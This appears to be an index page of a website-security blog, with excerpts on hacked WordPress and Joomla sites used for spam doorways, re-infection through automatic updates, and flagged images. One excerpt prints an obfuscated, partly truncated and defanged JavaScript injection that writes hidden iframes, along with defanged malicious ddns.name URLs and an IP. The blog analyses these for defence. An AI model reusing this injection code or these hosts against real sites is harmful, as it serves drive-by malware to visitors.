Careless Webmasters as WordPress Hosting Providers for Spammers
Foks, a frequent contributer to my investigations, recently pointed me at an interesting black hat SEO campaign where thousands of hacked WordPress blogs and Joomla sites were used to create doorways promoting online stores selling various “slimming pills” and fake luxury goods.
During the last few years I saw many attacks where cyber criminals created large spammy sites in subdirectories of hacked legitimate sites. It’s an easy way to create millions of doorway pages on thousands of established domains with good reputation for free (owners of hacked sites pay for hosting, bandwidth and domains) — typical parasitic behavior. Webmasters normally only visit pages they created themselves and rarely check what happens in subdirectories so they may not notice spammy sections for months. Sometimes such sections may be significantly larger than legitimate sections of hacked websites and attract much more search traffic.
The back end of such rogue sections is usually some doorway generating script along with rewrite rules in .htaccess or a simple blogging engine like FlatPress that doesn’t require a database. The only requirement of such solutions is PHP so they will work on most websites.
However this time spammers chose WordPress as a back end for their doorways. After all, if they hack a WordPress blog, the server is guranteed to be compatible with WordPress and all they need to do to install a new instance is get MySQL password from existing wp-config.php and chose a different table prefix for their WordPress database.
Here’s how the attack works »»
Malware Piggybacks on Automatic WordPress Updates
Most WordPress bloggers know the “Always keep your WordPress blog up-to-date” mantra. To make upgrades painless, WordPress developers introduced the “Automatic Update” features in version 2.7. A blog admin only needs to visit the “Update WordPress” page (Tools -> Update) and click on the “Update Automatically” button. That’s it! Easy!
Sometimes I see how webmasters misinterpret the importance of upgrades for WordPress security. They expect that if they upgrade a hacked blog, it will immediately become clean and secure. Unfortunately it doesn’t work this way. Upgrades can only clean core WordPress files, leaving backdoors, infected themes, plugins and database records intact. That’s why it is important to clean up your site before the upgrade.
Moreover, a few days ago I came across a new massive infection (more than 1,000 currently known infected blogs) that hijacks the “Automatic Update” feature and makes it the event that triggers blog re-infection.
Continue »»
Lorem Ipsum and Twitter Trends in Malware. Update.
A few weeks ago I published an article about an attack that hosted malware on a fast flux network of infected PCs and used a clever algorithm based on Twitter trends to generate four new hard-to-predict domain names every day.
Shortly after that I was contacted by foks, who shared some interesting information. He conducted his own investigation and found out how hackers injected those scripts into legitimate web pages. He also found a new (buggy) version of the malicious script.
Continue »»
Script Injection (*.ddns.name) and Backdoors
Just a quick review of hacker attack that I came across this week.
The attackers inject a malicious script into legitimate web pages on compromised sites and update the script several time a day (sometimes they change the script code and sometimes just make sure the script is still there, in case webmasters removed it). Typical scripts looks like this:
var $E=(Date);if($E){$f=['2*%0)%5}%1','%3{%b(%9_%8...skipped...(1))[$s.$Aj]($l[$0][$s.$1k](0,1));}}return this;},$3=$l(),$f='';$pi('l\x65\x6E\x67th');if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('s cript').length > 0){document.wr ite('<i frame src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}
The scripts create invisible iframes that load malicious content from subdomains of ddns.name (ddns.name is a free dynamic DNS service). E.g.
<i frame src="hxxp://npputdzykop .ddns .name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>
hxxp://bacmdmrnxdf .ddns .name/index.php?showtopic=892380
hxxp://hjuusnhqspt .ddns .name/index.php?showtopic=892380
hxxp://kmkyqilckhi .ddns .name/index.php?showtopic=892380
hxxp://npputdzykop .ddns .name/index.php?showtopic=892380
hxxp://jnobuznhccv .ddns .name/index.php?showtopic=892380
…
Last time I checked, the malicious subdomains pointed to 37.59.74.146.
When Google detects such malware on websites, you will see the following (or similar) messages on Safe Browsing diagnostic pages:
Malicious software is hosted on 7 domain(s), including hyyjkhfgmxk .ddns .name/, google-‐analytics .com/, kmkyqilckhi.ddns.name/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including google‐‐analytics .com/
Selected Tweets (Oct-Nov 2011)
Selected short messages and links you might have missed if you don’t follow me on Twitter.
It has been a while since the last Tweet Week. The main reason is I don’t tweet that often now to post my tweets every week and I don’t want to post old news here either.
So what happened? The answer is I can’t get used to Twitter web interface – it is so inconvenient. I had to use it when I had some strange problems with my Twitter client (twhirl). Thank’s god, I’ve finally made my twhirl work so I hope I will be able to tweet more often.
Anyway, here are some of the latest tweets.
Continue »»
Why Does Google Consider Some Images Malicious?
The other day I received an email from a webmaster whose site was blacklisted by Google. In Webmaster Tools, he found the following example of a malicious code detected on his site (domain changed):
<img src="http://example .net/images/logos/rssicon.png" />
So why did Google think this image tag was malicious? Can images be malicious? After all they are not scripts, iframes or embedded executable objects that that hackers use to attack web surfers.
Continue »»
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
